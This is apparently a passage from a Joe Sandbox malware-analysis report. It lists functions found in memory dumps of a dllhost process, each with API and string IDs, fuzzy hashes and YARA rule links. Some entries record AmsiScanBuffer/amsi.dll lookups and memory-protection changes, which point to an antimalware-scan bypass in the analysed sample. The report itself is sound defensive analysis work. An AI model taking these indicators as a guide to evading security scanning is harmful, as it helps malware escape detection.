                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 36018061710B4086EB14DB12A85C769E3A1F788FD0F484036DE4D83765DFBCC695C790
                                            Function 0000020175EE3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: bbefda0eab2ac0d45ffb8d33468e133f24fc9b24d23d28a3f8f44413e7fa4f1d
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: B4014C75211B4482FB649F21E84CB5AF3A0BB58B55F044029DA4D063B6FFBDC668C740
                                            Function 0000020175EB3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 80b3e830710e24d6643efa290442787b07cef8936d6e2ef8479e34cda0b2ce1e
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: C4014C75311B4482FB289F25E84D729F3A0BB49B85F04042ACE4D467B6EFBDC6A8C750
                                            Function 0000020175EE1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: de07b3896aca26e3970673ed883e7c361aeb57274c5bfd0faeb428f25ea6f42e
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: C4F04462314785D2F7608B25F988359E761F798B88F844022DA49465A9EFFCC7A8C700
                                            Function 0000020175EB1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: d450069934f6224dee815424a3619de30c26830a07ba0f30535fd61ba8481765
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: CDF04462304785D2E7208B25F5C8769E362F784B99F844022DA4986569DFBCC7A9C710
                                            Function 0000020175EE3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 90f48bc3f3ea7135eb4aec900a5762af736eb856e990d737b1a685627f118319
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 77F05E65714B8481EB848B16B91811AE661AB5CFC0F448131EE4A07B6ACFB8C665C700
                                            Function 0000020175EEB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: e2b2c5fbc6194b3f5550d926a67873bb5150d1337aa2e117e51c6cebfc95ad11
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 00F0B461311B0182FB508B24E88C369E334EB89760F540319DAAA451F6CFBDC768C710
                                            Function 0000020175EB3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 01863a37e37f8ef7b49f85d9999eebf00601dde775d7ed5d3a3f5973bd1e02d1
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 51F08265314B9481EB048B17B91816AE660FB4CFC1F449132EE1A07B3ACFBCC665C700
                                            Function 0000020175EBB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: 820c33927b2289ffdb93a356da3a42fe643b62cf9f080cd252d94c97325396e7
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: FFF0B421310B0182EB148B24E89D76AE374EB89761F540719DABA452F6CFBCC668C710
                                            Function 0000020175EE1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: aed811d49ab7c965a3d0c1219cdf8acea37dce7da73103a4b76d50124577bd1c
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 4ED06710625B00D5FB8CAF11EC5C758E261AB68B41FD54456C50E012F6EFBC8BB9D340
                                            Function 0000020175EB1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 451c8795f865cf1eabe2676fb8f762ded5504595dddb84e46f9109b0fc243ac0
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 33D06710611B00D5EB0CAF51EC5DB68E262BB64B41FC41416C51E452B2EFBDC7BAC350
                                            Function 0000020175EE5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 7f7363c3d3b0c3497ce85178aeb3576647f162142a41a95ac001fed149b8c49c
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: C302BA32629B8486E7A0CB55F49435EF7A1F3C8794F104016EA8E87BA9DFBDC594DB00
                                            Function 0000020175EE2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: c04b8babb8ad2baa0686628cf0ad8be68342a4c02b91f382c4177c5f0107b9c4
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 7551E231220B0087F364CF16E848A5AF3A4F388B94F54811DDE4A43BB6DFB9CA25DB40
                                            Function 0000020175EB2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: ff0519182f42d8182652b9dae57457b06670299e05831b56e32e588ff1fa1364
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 5A51D57530474187E369CF16E448A5AF3A0FB88B81F504119DD4A43B76DFBACA55CB40
                                            Function 0000020175EE2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 9d983320266970397c460f8245dc8e0c3819595df01f05bdee580baea82a4540
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 0C51C331224B0187F764DF26E848A5AF3A1F38CB90F54411DDE4A43766EFB9DA25DB40
                                            Function 0000020175EB2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: cd42e5dcbb5b277dda067fa6551f5aa621a8243b6c0a8ac1a1d97e3d0fa0d604
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 4E51C63531474187E728CF26E448A6AF3B1F788B85F504119DE4A43776DFB9CA65CB40
                                            Function 0000020175EE5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: e33cfaf7e6e0bf29b7c037277f82f90fa3c648b7d4cdd2cab6e43731885fbe31
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 7F619376529B8486F7609B15E45831EF7A5F388744F500116FA8D87BBADFBCC660DB00
                                            Function 0000020175EB5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 818c03b988d785ac1a56ee78f05939167607d58ed2b81554ba7fde1134482cf2
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 5F619936529B84C6E7608B19E45871AF7A1F388745F101126FA8D47BB9EFBDCA60CF10
                                            Function 0000020175EE3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: a30abf28705b30cb2bb7f67a5455e38368b227ce8675dd05ac74ef9203fc145e
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 78113D3661574093FB648F21E40865AE7B0FB48B80F044026DE4D037B5EFBDDA64C784
                                            Function 0000020175EB3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
